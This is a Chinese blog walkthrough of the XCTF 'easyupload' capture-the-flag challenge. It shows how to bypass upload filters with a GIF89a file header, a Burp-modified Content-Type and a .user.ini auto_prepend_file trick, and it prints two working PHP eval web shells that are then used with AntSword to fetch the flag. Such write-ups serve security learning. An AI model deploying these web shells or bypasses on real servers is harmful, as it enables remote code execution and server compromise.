攻防世界—easyupload

  • 2023.6.10 又试了一下 他好像会检测php字段,所以一开始的aaa.jpg怎么也传不上去,用a.jpg那种就可以了

在这里插入图片描述
在这里插入图片描述

  • 根据题目和页面我们可以猜到这应该是一个利用文件上传漏洞,利用一句话木马来获取服务器上保存的flag
  • 保险起见右键查看源代码
    在这里插入图片描述
  • 可以发现毫无用处
  • 那么我们接下来开始试一下上传一句话木马
  • 上传eval.php
<?php @eval($_REQUEST['a']); ?>

在这里插入图片描述

  • 可以看出他是有检测机制的,那我们再试试把拓展名改成eval.jpg
    在这里插入图片描述
  • 依旧不行,那我们再试着给他添加一个文件头,看看文件包含漏洞可不可以实现
GIF89a
<?php @eval($_REQUEST['a']); ?>

在这里插入图片描述

  • 那我们打开burp,修改他的Content-Type字段为jpg
    在这里插入图片描述
    在这里插入图片描述
  • 还是不行,那么,就只好去baidu了
  • 然后我就搜到了一个东西叫做.user.ini,具体啥用呢,点这里看原文章
  • .user.ini是一个很好用的漏洞,只要是以fastcgi运行的php都可以用这个方法。
  • 我对于这个ini的理解就是,他能帮我执行我写在他“auto_prepend_file=”后面的文件,不会被干掉。
  • 那么我们就在这道题里试一下。
  • 先写一个.user.ini文件
GIF89a                  
auto_prepend_file=eval.jpg
  • 然后我们上传他试试,不要忘记用不然burp修改他的content-type为image/jpg
    在这里插入图片描述在这里插入图片描述
  • 非常开心的发现上传成功了
  • 我们再试着上传eval.jpg,发现依旧不成功,很困惑。然后我又去baidu了一下,得到了一个新木马,命名为a.jpg,记得修改前面.user.ini中的文件名!!!
GIF89a
<?=eval($_POST['cmd']);?>

在这里插入图片描述

  • 成功了!
  • 然后拿出我们的中国蚁剑(百度一下安装使用教程,GitHub上下载)。
  • F12查看一下文件被上传的哪里去了
    在这里插入图片描述
  • 然后右键添加数据,输入地址和密码就可以连到他了
    在这里插入图片描述
  • 点击左上角添加后双击打开,然后再找到根目录,就能找到一个文件叫flag,右键下载就可以了

知识点:文件上传漏洞

  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Len1Mi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值